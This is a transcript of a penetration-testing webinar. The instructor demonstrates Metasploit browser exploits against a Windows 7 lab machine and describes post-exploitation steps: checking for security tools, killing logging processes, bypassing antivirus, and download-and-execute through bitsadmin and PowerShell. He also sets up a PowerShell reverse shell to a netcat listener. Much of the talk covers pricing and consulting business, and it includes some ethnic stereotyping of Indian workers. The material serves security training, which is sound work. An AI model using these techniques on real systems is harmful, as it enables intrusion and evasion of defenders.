vulnerable apps in the cloud. So what should we do? Should we start telling customers that the cloud is secure? Oh, I actually did it wrong. PHP was 3 and I chose 2. Let's try that. Oh, okay. Let's see. 3. Throw that in there, and now okay, let's see if that works. Ooh, this is going to be tricky. I don't have port forwarding set up. Oh, man. Let's see. Bind shell, I don't have the other ports open. Reverse shell, I don't have port forwarding set up. So, yeah, that would take some finagling to make that work. But, yeah, I would probably, in the real world, go for option 1. And then I would set up port forwarding on my router to forward the port down to my laptop. Now, I can give you guys a quick tip. I've been on pen tests where I'm at a hotel, and some hotels actually give you the option for a public IP address. And I've had to do that before. So let's say you're on a hotel wireless, and the hotel, when you sign up for the wireless, will have the option choose public IP. And what it's for is it's for VPN users. So people who are VPNing into work and they have to have a public IP so that their VPN can work properly, I've had to do that to get a reverse shell to work. Yeah, I could put the attack machine in the DMZ of the router. That could definitely be a way through it. Okay. All right, so I'm going to kill that. Okay, now how do you make a reverse shell using OpenVPN? Okay, generally we wouldn't do it that way. Excuse me. Generally we'd use OpenVPN to create the tunnel to the next hop that we want to use. So you want to be 3 or 4 machines away from your attack target. So you want to, and you're doing that to hide your IP address. So you're going to use OpenVPN to connect to each of those 3 or 4 machines in a chain, in a series, so that you can hide your originating IP. So you generally would not use OpenVPN to catch that. Yeah, I did the netcat thing, but I did that locally. I did that internally. So I had the exact same web server that you guys have on the public IP. I had that on an internal IP, which is 10.10.107, and that's why you're seeing that in your text file. That's why you're seeing that in your pastebin file, 10.10.10.10.107. I have the same server internally. That's why I was able to do that. But yeah, if we were going to do it publicly, I'd have to set up port forwarding. And can you reverse in on UDP? The answer is yes. Not for this particular exploit, but in other cases, yes, you can do a reverse UDP shell. Okay, and remember, what nails you is not the fact that it's TCP or UDP. What nails you is, do they have a content filtering proxy like WebSense, like Bluecoat, like Foolproof, like Dan's Guardian, Squid? Do they have a content filtering proxy? That's what hurts. And in situations where they have a proxy and their proxy requires authentication, that's where you really get in a bind. Not so much just with the type of shell that I get. Okay, good, good. All right, guys, let's make our transition. I think we're ready to start. Yeah, Adrian, what you're saying is correct. Reverse HTTPS is generally your best option. It really is. You're very, very, very rarely going to be in an environment where your proxies and something like that will do outbound HTTPS inspection. So that's hands down almost always going to work. Is it possible to get root from the OS shell? Yes, of course it is, but you're going to need to do something like either reconfiguration file information or local exploit. It's the same. Once you get on the machine, you're generally on the machine as user Apache. So you're just a regular user. You're going to have to try to get privilege escalation. Now in our case, what you're asking is, well, hey, what about when MySQL is running this root? Well, the passwords have to be the same. Even if MySQL is running this root, you still set the MySQL password. So you're hoping that the root password for MySQL is the same as the root password for the OS. And if it is, then yeah, you can just steal the MySQL password, crack the hashes on that, and then immediately try to just log into the host as root. Okay, before we move on, after you give us the link for this webinar, can we use the Acme laptop website to practice? Yeah, that's a tough one. That's a tough one. I'll keep it up for the rest of the day if you guys want to do that. But as far as just leaving it online, I can't really do that. But I keep these in my lab network. I've got how many of these do I have? I got like 6 of them. Yeah, Adrian, it's not a matter of hosting or cost or anything like that. The issue that you run into is because you have the ability for people to upload a web shell that can use the box to attack other machines. That's That's the issue, right? Yeah, Richard's right. It's liability. That's the issue. So it's not that I don't want you guys having access to it, because anybody who's in my pen tester lab, you know, they rip into these things all day long. It's that I've got an open site out there that people can mess with. Now I've got a new one that I'm building. I've got a new one that I'm building that'll be like a sandbox kind of environment, and that one will be up 24/7. But that'll be like a challenge server where you'll have to kind of like hack your way through different levels. And you know, because it's sandbox, I'll be able to leave that one online. So. Okay. Yeah, you can't browse the resume folder. Yeah, again, I think that's because of the stuff that people are uploading to it. I can kick it over and make it, let's see. Okay. You should be able to hit the resume folder now. Okay, let's start. CV tools, Metasploit, left. Man, I really cannot type today. Gonna have to do that sacrifice to the demo god someone was talking about earlier. Okay, so what I'm going to do is I'm going to start MSF console. Okay, definitely going to need to change this file. Strategic set tools. There we go. Do I use hack.me? No, I've never used it before. I've heard about it, and I know Armando, the guy who runs it. Can you do the same thing with this as you can do with can you do the same with WebGoat as you do with my website? The answer is no. WebGoat's a level-based website, so you have to work through the levels, and it gives you hints and stuff like that. Sensitive image. I just restarted that app. Okay. Richard, if you're getting cannot allocate memory, what you want to do is you want to upgrade the amount of RAM for the virtual machine. So just take it from 512 to 1 gig or 1.5 gig or something like that, and that should take care of your MSF console issues. Okay. So if I look at this /resume, am I going to be scared, or should I not look at it while this thing is recording? Scott's saying that it's a sensitive image. Oh, it's legit. Okay. All right, let's see. Resume. Oops. Okay, so the Windows 7 password should just be the word password for user workshop. Resume. Oh, wow. Okay, so you uploaded a whole movie? Okay. All right, guys, so I've got this loaded up. I've got MSF console started. Now what I have is I have my virtual machine set to NAT, network address translation, and then I'm going to try to have the same thing for my virtual machine, my Windows 7 virtual machine. It's also set to NAT. Hey, thanks, Ace. I really appreciate it. Okay, so what was the command to start MSF? Let's do that. So you want to do here's how you get all that stuff squared away. Now what I'm going to do is I'm going to set up the exploit. Okay, and I'll paste all those things in there. Okay, and now I'm just putting it so that your Ubuntu IP goes here. And yeah, you want the workshop.txt file that I'm using. That's this. Here you go. Okay, so now that that's all set up, here's the address. You see where it says local IP? Here's the address that I'm going to use. Now, inside my Windows 7 machine, let's get that sucker back going. Okay, and it should just be password, all lowercase. Now I'm going to try and start this up with start up Internet Explorer. I'm going to paste that address. Okay, if you did all of your updates and it updated Internet Explorer, go ahead and downgrade Internet Explorer 9 or 10. Make sure that it's Internet Explorer 8 for this particular exploit. Okay, so I'm going to say ask me later. I'll paste that in there, and now let's browse to it. So you should now send me this. There we go. Okay, so MS1103, and I've actually used this exploit quite a bit on Pentest. I know it's a 2011 exploit, MS11 2011, but the reason that this sucker works so good is because very few people in their organizations actually update .NET. You've got people who are great at patching all kinds of vulnerabilities, but they forget .NET. Okay, 1 second. There we go. All right, let's see here. Yeah, and Anthony, you're correct. You set this up through phishing, and yeah, when I do this, I'm generally on an actual engagement. Okay, let's check and see if we got a session. It looks like we didn't. Nope, no session. I'm actually going to try and rerun this exploit. So let's close this. Let's try this again. Okay, so it's sending that exploit one more time. And I'm really going to be having fun with the demo gods if this sucker just flat out doesn't work. Yeah, Anthony, you can give up on finding a remote exploit for Windows 7. It's going to be client-side. It's going to be Internet Explorer. It's going to be Java. It's going to be Flash, QuickTime, Shockwave. It's going to be something like that. Yeah, no problem, Jason. I'll get you all that stuff. How do we get around AV? I'll do a whole separate segment on that. I don't know if I'm really going to have enough time to cover all of that today. But yeah, I'll do a whole separate segment on that. You can get around AV, just to answer your question. You can generally get around AV by modifying the exploit or by modifying the payload in the exploit. Yeah, so Anthony, you've got a very legitimate issue. A lot of customers are unbelievably reluctant to let you spearfish their users. I mean, like just crazy reluctant, will not let you. And we go through a lot. I wish I could tell you it was easy. I wish I could tell you every customer just loves it, but I'd be lying. So essentially what you're trying to do is you're trying to get the customer to understand that this is a valid threat, that this is the way that attacks work today, and then you try to get them to understand that you're willing to do a representative sampling. Let the customer give you the list of email addresses that they want you to spearfish, and they're generally going to be low-level people. They're not going to be high-ranking people in the organization. And you're going to show that once you get access, what you can do. And that's normal. It's very, very normal. Okay, let's see here. Man, we are not doing too good with this exploit, are we? No problem, Antonio. We'll see you later. Yeah, good point. Good point, Adrian. So I've had Yeah, Joseph and Adrian are right. It's how you sell it to them. I've had customers tell me, hey, Joe, I'm not going to pay you. Tell me that I need security awareness training. Okay, let me see if I can find another. I'm going to try and do a different exploit because it's 2 times and this thing didn't work. So is it working for anybody else? Because it's not working for me. And it's pretty bad because it almost always works. Yeah, in the virtual machine, you'll have to downgrade the you have to downgrade Internet Explorer version 10 for this exploit to work. Let's see. I'm sorry. Yes, down from 10 to 8. Yes, you're correct. Yeah, we never do browser auto point. We never do auto point on a pen test. Okay, sounds best. Okay, let's grab that. Let's do this again. Okay. All right. Okay, so that exploit worked for me. Okay, great. So IE C generic element use after free UAF exploit. That seems to work. So let me paste in what I just did. Okay, we're going to need to change the workshop.txt file to have the correct exploit. There we go. Okay, and let's paste all that in. Yeah, no problem, Jeff. Go take care of family, and yeah, the video will go out to everybody. Yeah, if you're on IE9 in the virtual machine, downgrade it to IE8 for this exploit to work, unless you're going to use a different exploit. Okay. All right, so I got my session to work, and this should work even though semantic endpoint protection is enabled on the machine. I know a lot of people always ask me about that, so I'm trying to use stuff that works even though it's Windows 7 64-bit with semantic endpoint protection. So just hit enter, now we'll go sessions-L, and you see that I've got a session. Okay, so now that I've got my session, I'm going to interact with it, session-I, and then the number 1. Okay, how many of you got your shell? Okay, good. A couple people got their shell. Good. Okay, so once a system is compromised, how easy is it detected? I really think that's really just a matter of what you're doing. So when you're doing user level type stuff, there's generally not that many times that you're going to be detected. When you spearfish a user and stuff like that, you're usually okay. And even if you are detected, usually you're caught by, McAfee ePolicy Orchestrator or something like that. And a lot of those events don't get looked at in real time. So let's say Semantic Endpoint Protection or McAfee EPO, they catch you and it eats your exploit. It's not like somebody's sitting at that console in real time processing every event and then doing something about it. So in a lot of cases in real pen tests, even though you get caught, quote unquote, even though you get detected, quote unquote, oftentimes you're really not watching it like that. Most people are still running around fixing printers and, doing regular IT stuff. So, until catastrophic events happen, people generally aren't looking at logs real time. They're not looking at security products real time. Until you start getting into organizations with $1 billion in revenue and higher. Once you start getting into that, then yeah, you will start to run into environments where they have a dedicated security staff. It's normally your $1 billion companies and above that have a dedicated security staff, someone who can a team of people who watch the stuff all the time. Okay, a few more seconds. Let me get all this stuff deleted. Was there anything special? Nope, it's just a generic Windows 7 64-bit, nothing fancy. Okay, guys. Okay, because you were able to detect the intrusion within 10 minutes, and you wonder how. Okay, so the company detected that you were on the machine, but they didn't tell you how they caught you, Drupal? Okay, okay. And was it a workstation compromise or a server compromise? Okay, workstation. All right. Do you know if they have like a SIM product, some sort of login product, like ArcSight, Envision, something like that? Okay, so you run a black box assessment, okay. But you don't know what defensive mechanisms that they had, right? You don't know if, yeah, okay. So here would be the first thing that you would try. As soon as you spearfish a user and you get on their machine, what you want to do, so let's go session-I1. I interact with my session. I want to do a sysinfo, and I want to do an IP config. And then immediately after that, what I want to do is a run get countermeasure. So run get countermeasure like this. And what you're trying to do is you're trying to take inventory of what defensive things are on the machine. So is the firewall turned on? Is verbose login turned on? What is it? You also want to do a run check VM. Okay, figure out if you're on a virtual machine or not. So you want to figure out what security products are on the machine, how's the stuff configured. And if you can, okay, would this determine if there was a pull from ArcSight? Not necessarily, right? But you have to be conscious, right? Most people are going to have some sort of agent that's doing the logging, right? So you'll either see like the ArcSight agent, or you'll see like Windows to syslog. You'll see something like that to let you know that remote event logs or remote syslog is in use. And you're going to do run, get, countermeasure. You're going to do check VM. And then worst case, you're going to end up just doing a PS and going through the process list, trying to see if there's any login or monitoring utilities running. And then what you would want to do is you'd want to escalate your privileges to system, and then you'd want to kill off that process. And that's going to be what you're going to want to do. Now, again, most penetration tests don't have a stealth requirement. So, we're oftentimes not intentionally trying to be stealthy. Most of the time it's just get this thing done. Now, in cases where they're trying to have us be stealthy, then the goal is a little bit different. You'll go a little slower, you'll modify things a little bit more, but customers are typically reluctant to pay for that because it takes longer. And taking longer means it costs more. So most places that I've pen tested don't really have a stealth requirement. And the ones that do, they're big banks, they're big government, they're big whoever. And they get pen tested pretty regularly. So those those places, you have to kind of do your homework on those, because they're actually a lot tougher than you think. Yeah, no problem, Hitoshi. Same question. Yeah, all the videos for everything I'm covering today will be sent out. Okay, so the next question is, how do you figure out if you're on a honeypot or not? The exact same things that I just did. Get countermeasure, check VM, check the process list, and then also when you look around the machine, try to figure out if there's anything on it. Servers are a little bit more difficult because oftentimes there's very little actual data on a server, kids' pictures and stuff like that. But workstations are the best because, there's nobody who uses a workstation at work and does absolutely nothing to personalize it. There's just no one. So, you get on the machine, they're going to have their custom fonts and their custom screensavers and their pictures of their kids and whatever. And that's stuff that you're going to be looking for. If you get on a box and you don't see those things, you do your check VM and you see that it's a VM, more than likely you are on a honeypot. Okay. Okay, any other questions? Okay, how long does a typical pen test last? Typical pen test is 1 to 2 weeks. Larger pen tests are like 3 to 6 weeks. But your typical one-hitter-quitter pen tests are usually, a particular subnet or set of subnets, a particular website or a particular set of websites, and usually 1 to 2 weeks. The price is going to float somewhere between $5,000 and $15,000 for that, depending on the scope of it. No problem, Mike, man. You enjoy. I'll catch you later. Okay, so what would be considered a large penetration test? I'll give you guys an example. Here's my price list. Okay, now again, okay, now again, what I do is not what everybody else does, but it should give you some ballpark idea. I do a lot more than what a lot of other pen test companies do, but you should have an idea of what I'm doing. Okay, so I price my pen test in levels. So I offer a level 1, a level 2, a level 3. And each level is 1 week. So you've got level 1, a 1-week assessment, level 2, a 2-week assessment, and level 3, a 3-week assessment. So for me, I'll do level 1 up to 5 domains, up to 50 external web servers, or generally servers. I think 50 external servers. Most of them are going to be web servers. Then on the internal assessment, I'll usually do up to, about 5,000 internal IPs. Okay, so, you got to figure your typical network, if you're running Nessus or whatever type of vulnerability scanner, you can typically scan about 100 hosts per hour. So if you get into something like that, then I usually just leave my laptop there overnight, and I just let it scan overnight. So the customer gives me permission to run my scans overnight, then I'll give them this pricing. Now, if the customer will tell you something like, yeah, you can leave your laptops here, but we can't be held liable for it, I usually tell them that's no problem. I'll just leave my laptop there. We usually lock it in somebody's office or something like that. Okay, so you can kind of see that what happens to me is if anything in level 1 goes over, so if it's more than 5 domains, it's automatically level 2. If it's more than 50 servers, it's automatically level 2. If it's more than 5,000 IPs, wireless. If it's more than 1 location, it's automatically level 2. Physical. If it's more than 3 facilities, it's automatically level 2. Right? And then my level 2, we do the exact same thing. If you keep going over in any of these, it automatically bumps you into the next level. And it makes it easy to sell. It makes it easy to explain. It makes it something that somebody can do over the phone. Okay, so now let's go to web app. Web app for me, I use the same type of framework, a level 1, a level 2, and a level 3. And I try to keep it as simple as possible. No, not if it's over 50 domains do I not take the job. It's just custom pricing. All that means is it just doesn't fit into this. Do I ever have issues with companies not wanting to pay me? Yes, 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 and yes. What I've had to do in that regard is try to make sure that the customer gives you at least 33% up front. Try to get 50. The larger the company, the more comfortable they are with this. The tiny little mom and pops, they're the ones who are going to give you the grief. But I can tell you a lesson learned. If they give you a whole lot of pushback on your upfront fee, then you're probably going to have a tough time getting paid. Just letting you know. Just letting you know. A lot of people, yeah, exactly, 50 cal, exactly right, remainder due upon the delivery of the report. A lot of people heard about the issues that I had with Samuel Shaw, and I really kind of ran into a lot of financial difficulty, my personal life, right? And that was because I had a pen test customer who did not pay. I had a pen test customer who owed me, a little over 100 grand. And we did all the work. We didn't bill up front. We did 33% up front. So what we ended up getting stuck with was I took like 6 people on site with me. So I had people doing network, I had people doing web app, I had people doing, all these different parts of the engagement. And then what I got stuck with is, you take contractors and subs out with you, they want to get paid. So they don't care what your excuse is, they want to get paid. So I ended up having to pay them, and then when the customer didn't pay me, I got stuck. So I got really kind of jammed up and really owed a lot of money. And that's kind of how that all happened to me. So since then, I really, really don't do anything for less than 50%. And then we don't do Did I ever get the money, Andrew? No, I did not. I have never received that money. I've never received that. That's back in 2011. I'm still owed that. You know, and I mean, it's not uncommon. You know, I had probably a couple of customers per year, you know, up till last year, you know, where I was easily owed, you know, close to like 200 grand. You know, just, you know, people paying late. So I had done one for a particular government, you know, a foreign government, and you would think a European government, you know, the equivalent of the State Department, you know, I didn't get paid for 8 months for that. Training at a conference that I did, I didn't get paid for like 4 months for that. I had one training at a conference that I did, I didn't get paid for like 7 months. So just now, I really don't do that. They're going to pay 50% up front or I'm not taking the job. So yeah, good question. That's just kind of the reality of it. It's just kind of the reality of it. Okay, people want to know what industries do I generally do this stuff for. I try my best now to really stick in the financial sector. It's hurt me in the sense that I had to get a lot higher insurance because you really can't do a lot of bank pen tests with just your regular $2 million insurance, the stuff that I did when I was doing PCI pen tests. Most of these banks are requiring me to have 5, sometimes, you know, $10 million in errors and omissions, fidelity bond, and the various other types of insurance. So it ended up costing me a lot of money just to get all the right levels of insurance to do financial systems pen testing. But it's been a lot better. You know, pen tests are much more complex. The pen test, you know, you run into, you know, better products, you know, endpoint protection, IDS, IPS, all that kind of stuff. You run into that stuff on those types of tests. And the customers are mature in their security process. You know, they have patch management, they have configuration management, they have those things. And I needed to do that for my career. And the reason I say that is because it's so price competitive. You've got people who will do pen tests for banks, no less, for like $5,000. You know, just phenomenally cheap, right? And generally, those are less experienced consultants or consultants really trying to make a name and just cut a customer a real good break. So what I ended up running into was people were wanting me to do, you know, these one-week pen tests, or so effectively vulnerability scans, and I had a tough time justifying my rate because my rate's a little bit on the high side. But what I had to do was I needed to find a way to show value in the stuff that I do. And the value in the stuff that I do is my ability to get around systems, security systems, my ability to articulate the vulnerabilities, and my ability to help the teams fix the stuff. You know, I'm strong enough in network, web app, mobile, and development that I can usually help a customer, you know, fix whatever they have. So that's what I try to bring to the table. And I really try to articulate that value because it's the only way that you're going to get your decent fees. And because I'm not IBM, because I'm not Cisco, HP, you know, you have to be fairly price competitive. So, I mean, there's been times where I've bid on stuff, and like this last pen test I did for a financial, I think we bid $70K, and we were the lowest bidder. We won it, but I mean, the next bidder was like $140,000. You know, so a lot of these times you shouldn't be afraid to compete with the big boys. A lot of times the customer is looking for a small company, and they just want the small company to be reputable. I mean, that's really it. So you win a lot of them. I don't want you guys to think that you can't beat the the big boys in bidding for stuff. You can beat them. And oftentimes, you have the better value proposition. Okay. Yeah, you guys can have this price list spreadsheet if any of you guys want it. That doesn't bother me at all. Okay, how do you get a government contract job to do security assessment? I mean, if you become an independent IT security contractor, how do you get government jobs or contracts from big corps? Okay, so what you're going to want to do is you're going to want to go to websites that hold what are called government bids. I think the one that I can think of offhand is probably FedBizOps. I think that's what it's called. Let's see. FedBizOps, yeah. There you go, FedBizOps. That's where you're going to want to go. Right, and then government entities are usually going to host their RFPs on places like FedBizOps. Let's see. As far as like areas that I try to work in the financials, try to work retail, try to work anything commercial, you know, where they've got like commercial products that they sell. You know, businesses in healthcare. Healthcare is usually pretty good. Trying to think what else is pretty tough. Tough would be manufacturing. Manufacturing companies, generally until they get to larger revenue manufacturing, there's just not a lot of work down there. And then, you know, you would think that the manufacturing would be like a great place, but they generally don't have very much technology. Just a lot of big machines and generally not that much technology. Okay, Hitoshi, I can definitely say it would be better for you to meet and know as many pen testers as you can. So really get out there and go to conferences. I can tell you this, there's plenty of subcontractor work, if you're willing to work by doing what they call white labeling. So with white labeling, what that means is, you know, KPMG is doing a penetration test. Well, KPMG keeps their pen tester teams small. I'm not literally saying KPMG, but just as an example, they keep their pen tester team pretty small, and then when they get more tests than they can handle, they'll call somebody like me. And then I'm the one who goes out on site and says, hey, I'm wearing a KPMG shirt, even though I'm just a subcontractor. Now, those types of gigs usually come when we're overworked. The practice lead goes over to one of the pen testers and says, hey, we're swamped this month. Do you know anybody who can cover 2 pen tests? You know, and then, you know, that person will usually say, oh, yeah, you know, I know Hitoshi. He's pretty good. He can handle it. And then they'll give it to him like, well, hey, can Hitoshi handle it for $150 an hour and get the report turned out in a week? And he'll be like, yeah, Hitoshi's got it, no problem. And that's really how the bulk of that stuff works. There is a phenomenal amount of subcontract work in this business, but it is very much who you know. That is the biggest truth that I can tell you. A lot of these really large companies, they'll tell you that they've got this massive staff of people, but what they have is they have a small staff, and they've got tons of subs that they work out with and business partners so that they can say that they have the capability. That's how they fluff their portfolio. Insurances that I've been required to show would be errors and omissions E&O, errors and omissions, generally $2 million, errors and omissions. Fidelity bond. Fidelity bond is if you're working in a financial and they want to make sure that you don't try to steal the money that you're hacking. You're hacking in servers that are doing financial transactions. They don't want you stealing money. They'll often want you to have, why, I don't know, workman's comp. I have no idea why that one was, but okay. And then one more, something for like vehicles. I don't remember what it is, but I'll look it up if you want. Okay. Okay, that's a good question. What about places like Elance? So you've got places like Elance, Odesk, Bworker, these types of what are called outsourcing websites, IT outsourcing. So, and they're great places. They're great places. What I can tell you about that kind of stuff is that is horribly low-priced work. You're going to be talking about guys who are looking for you to assess their website for like, $75. So you're going to be competing when you do the Elance, Odesk, Bworker. When you do those types of websites, you're going to be competing with the entire globe. And you're generally doing a lot of mom-and-pop websites. So your sister's uncle's cousin has got a new flower website, and he's installed WordPress, and it got defaced yesterday. So now he's going to go on Elance, and for $25, he wants somebody to not only perform a security assessment on it, but fix the vulnerable source code that caused the defacement as well. And then you're going to be competing with people in several, second and third world countries. So you're going to be competing with people in Bangladesh and, the Ukraine and all these different countries who are willing to work. The Philippines, they're willing to work for like $3 an hour. And I'm not even talking crap. A lot of them are very competent, but just the variance in the economy, you can get a guy with a master's degree and a lot of really good education and a lot of really good work experience for like $9 an hour out of the Ukraine these days. Same thing with Bangladesh and these types of things. So I would say if you're just looking for some spare cash, kind of the gas money kind of thing, a little bit of shopping money for the wife or whatever, yeah, Odesk, Bworker, all that kind of stuff. If you can really live off of it, I don't know about that. And if you do, I don't think you live in the U.S. Okay. Where's pen testing headed in the next year or so? I definitely think it's getting more price competitive. It's a lot of web app, definitely more mobile, definitely more cloud. Software as a service, Igor, what you're thinking is right. Continuous pen testing is going to be the kind of model that I think you want to sell, right? Where they buy, like I've started doing that, where all my proposals include a 1-year price and a 3-year price, right? Because a lot of companies try to tell you they really don't want to hire the same pen tester the following year. So if I cut them a good enough deal on a 3-year gig with intermittent things in between, I'm finding that sells a little bit better. So I'd be looking at that software as a service, continuous penetration testing, regular reporting that they, you show back up quarterly, and then what does that do? That keeps you in front of the customer. There's your chance to get in front of the customer, talk about stuff, really kind of develop that relationship. So I really think that's definitely the way to go. Okay. C, you're from Malaysia. I don't think I'm understanding your question, bud. Okay, you're from Malaysia. What's going on, C? You said you want to know about getting into it from Malaysia? Okay, what sites do companies post private RFPs on? What sites do private companies post RFPs on? God, I'll have to look. I can't think of any offhand, but there's like 4 or 5 that are pretty common for IT outsourcing. You know, and a lot of integrators use sites like that. And my buddy's an integrator, so I'll give you stuff like that. Oh, okay. C, you want to know if FedVis Ops is applicable to Malaysia? Yes, it is. They don't really care if you're a global company. What you'll get nailed with is you may or may not have the particular requirements for working in the U.S. And what that would mean would be like, are you on GSA schedule? Do you have a DUNS number? Do you have some of the government approved vendor accreditation stuff? You know, like minority-owned, veteran-owned, small business, HUB-zone, you know, GSA, DUNS numbers. There's all kinds of different things that you have to apply for to do a lot of this kind of business. Okay. Do you suggest gaining more experience before becoming your own boss with pen testing? Yes. Yes, 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 and yes. You'd be surprised. Pen testing is really low margin, and for all intents and purposes, not a good business. Most of the companies, when they start out as pen testers, they eventually transition to security consulting because helping people with firewalls, IDSs, architecture, policy, all the different things associated with building a robust security plan, that's where you can make more money. That's where you can charge a lot more. So to give an example, you might charge $10,000 for a regular pen test, but for a full-blown risk assessment and, you know, integrating regulatory compliance like PCI, GLBA, all that kind of stuff, and then helping them with, you know, IT training and helping them with policy development, you might be able to wrap all that up, you know, for like $100K. So the margins are a lot better. The projects get a lot better when you get into full-blown security consulting, and it can include penetration testing. But if you just are going to do penetration testing, then you're going to find that companies need pen tests annually, and they generally only want to do it on the areas that are, you know, most likely to be audited. You know, so take the case of PCI. This is where they know they're going to be audited. That's what they want to be tested on. That's it. So they try to keep it pretty crappy and pretty small, right around the stuff that's going to be audited. Okay. Andrew, is there a lot of work outside the U.S.? Western Europe, yes. Ton of work in Western Europe. Second world countries, no. Second world countries, there's a lot of training. The bulk of the pen testing I do in the U.S., the bulk of the work outside of the country for me is training. That's just because the margins are so low. You know, when I'm out there competing, you know, in South America, you know, they generally can't pay even half my hourly rate. So teaching makes the most sense because I get, you know, 10, 12, 15 people in a classroom, then I'm still making an American rate. What about countries like India and Singapore? They are night and day. India, you will not be able to charge U.S. rates. Singapore, you can even charge higher than U.S. rates. You know, Singapore is pretty pricey. So if you're working for like a Singaporean bank or the Singaporean government, you're going to find that you're going to be competing, Beijing, same thing. You're going to be competing with companies like Ernst & Young, PwC, KPMG. You go to places like Singapore to do pen testing, you're going to be competing with the big boys. India, complete opposite. You know, one, you've got the volume of people there and the volume of deep technical people there. And Indians, just like Sri Lanka, Bangladesh, you know, Nepal, all the countries in that region, they're very reluctant to pay for professional services. They often think that you should get professional services for free. And I'm not trying to come across sounding racist. I'm just telling you that's what the culture is like over there. Okay. Would a CCNA, CCNP help? I would say yes, it would help, but I would not consider it as a primary thing to focus on. It's definitely important to have a strong network background, but for the future of penetration testing, your ability to understand web app, mobile, and cloud, that's where it's going to go. Okay. How do you rate Indian pen testers? They're all over the map. They're all over the map. You know, you've got guys that I think are very good, guys like Himal Shah, good friend of mine, guys like Sriraj Shah. You've got people like Vivek, you know, who run SecurityTube. You've got some guys over there who are flat out brilliant. I mean, brilliant. But what you run into with a large portion of them is the language barrier and, for lack of a better word, not really being able to think out of the box. You know, they're very, as a culture, what you run into is they're very like to the point. You know, you told me to do this, I do this. You know, they don't really kind of take it overboard and all that. So what you end up running into, for me, I've tried my best to have a project manager from India. And that project manager in India would be the one who interacts with the dev team over there. I've only had to work in India and Sri Lanka, not from the pen testing perspective, but the software development perspective. And what we've ran into is they're quite confident, no different than you know, having, you know, in America a bunch of Mexican laborers, because I lived in Arizona, right at the border to Mexico. The best thing that you could have is a foreman who was Mexican, and you know, he handled that. He handled all the cultural stuff and, you know, all of that. And I think you've got to do the same thing with India. My experience working in Africa is non-existent. I'll be in Africa for my first time in November. I'll be in Kenya, and I think next year in February I'll be in Nigeria. I should be in Nigeria maybe 3 times next year. So yeah, I should see you down in Nigeria. Ever work in Australia? No, I have not. But I can tell you in Australia, they've got a ton of really smart people. So you've got Australia and New Zealand. Australia, you've got securityassessment.com. You've also got Insomnia Security, you know, Brett Moore. You've also got Aurora Software in New Zealand. You've got like 2 other companies that have some really sharp guys. So the Australians are very much a technical group. They've been known in the IT community for having like really sharp Cisco people. Make sure I go to Mombasa. Okay. Okay. Yeah, Hitoshi, what I think would have benefited you would have been this webinar that I did. So I did a webinar on becoming a pen tester. And this webinar covered all the stuff that you're asking, you know, like certifications to get experience, to get technical ability to know that you're ready for the job, you know, all that kind of stuff. I went through all of that, you know, starting your own firm, all that stuff. Do I know pen testers in Malaysia? Yes, I do. Actually, I know quite a few pen testers in Malaysia. My buddy Fong, he runs LE Global. LE Global. Yeah, bud, we're getting ready to wrap this webshop. Wrap up this workshop. Have I done much work in the UK? Yes, I was in. I did a ton of pen tests in London, Basildon, Merton. I did a ton of pen testing in the UK, and they have a lot of work over there. The UK is ripe with pen testing, and that is from the standpoint of need and the ability. You know, they've got some really deep technical guys over there. Okay? Don't you have to be CREST certified? It would definitely help you. Do you want to cover Windows 7 post-exploitation? Yeah, we can go through some of this. So let's say we look at this spread, the document, right? France, Switzerland, Germany, most of the countries in Western Europe are typically serviced in terms of pen testing by UK pen test firms. Oh yeah, I'd love to go to Nova Scotia. Yeah, I'd absolutely love to go. Okay. Most people have seen the Metasploit stuff, so hopefully, you know, that gives you a pretty good idea of stuff that you can do in Metasploit. What I'm going to do to show some of this Windows 7 post-exploitation stuff, it'd be good to show this. So my VM has gone back to suspend. Okay, now what I'm going to do is I'm just going to kill this, and I'm going to open up a command prompt. Now, again, I'm only doing this inside of the GUI just so I can show you. I don't think strategic sec is down. Let's see. Yeah, the site's up. It's just slow. Yeah, still showing Cloudflare. Yeah, the site's up for me. Okay. So now we're actually in the website. I'm going to do this download and execute in Windows 7. So the first option that I'm going to do is I'm just going to run this VB script option. So in my command prompt, you see that I opened up a command prompt on the desktop. I'm just going to paste all of this into it. So it's everything from download and execute in Windows 7. I'm just pasting all of that right into this command prompt. Now, again, I'm only doing this inside of the virtual machine instead of through Metasploit so that you can see that it downloads this file from the web and runs it. And all it is, it's just a pop-up that just says, you know, pwned, but it proves to you that exploitation is possible. I'm going to do a del mesh.exe and delete that file. Now I'm going to do the same thing with bits admin. Now I'm showing you all of these things because when you get to where you're pen testing Windows 7 and Windows 8, you're going to find that it's a lot harder to make your little Metasploit tricks work. You start pen testing high security environments, you're going to need to do a lot more stuff outside of Metasploit. You know, so you actually end up going back to the old days of hacking because a lot of stuff is tuned to look for Metasploit. So I had a decision I had to make. Am I going to spend half a day modifying stuff in Metasploit so that it doesn't get detected, or am I just going to use a bunch of really old hacking methods that worked, you know, 8, 9 years ago? And you'll be surprised that stuff that's 8, 9 years old, that stuff still works beautifully. TFTP, FTP scripts, and all this kind of stuff, batch files, DB scripts, everything that we used to do, that's the stuff I'm doing now. So you're asking me, like, hey, what's it like to pen test these new banks that have all these whiz-bang security stuff. It's like, blast from the past for me. So here, this is an example of a new trick. This is an example of a new trick. So this is an example of a new trick, and then what's going on here is the bits admin, the bits service, is how Windows downloads updates. So it's kind of like wget for Windows. So it's a nice way to be able to go out and grab files. So bits admin is the command line utility that can go out to the web, download a file. Now what's really interesting is even if you turn off the bits service, which is part of most of your CIS and STIG hardening guides, bits admin, the client, is still present and still works, even if you've disabled the bits service. So if you can get access to a machine, this is a great way to do it. Okay, another thing to try to run is PowerShell. So I'm going to use PowerShell to create an object to go out to the web. There you go. And it went out to the web and downloaded and ran it for me. There we go. So these are three ways that for me are pretty doggone handy, to go out and do things. Now some other things that are pretty interesting, I think I'm going to show you guys a PowerShell reverse shell. Let's try this. Let's skim down here. So I'm going to start let's go nc-l-v-p 1, 2, 3, 4. So I'll start that, and let's make sure I get this IP address right. Make this 192.168.3. Was it .3 or .6? I think it was .6. Yeah, it was .6. Okay, .6.1. Okay, so I'm going to copy all of that. Yep, I certainly will give you this commands.txt file. Okay, I'm going to copy all this. I'm going to paste this in. And then, boom, that becomes my reverse shell all over PowerShell. And what's nice is now you can do all of that, and you've got your reverse shell completely over PowerShell, and you don't need to put netcat on the machine. So you won't have to deal with antivirus and all that other crap, because PowerShell is going to be native on the file system, on the OS. It's going to be native. Okay, you're going to find that that's going to be something that you're going to try and use a lot of. Whew, boy, we covered a lot today, huh? Okay, so this commands.txt, I got to give you guys this. This has got a ton of stuff from the PowerShell for Pentesters course. And then there's a ton of stuff on like host enumeration that I really didn't cover. So 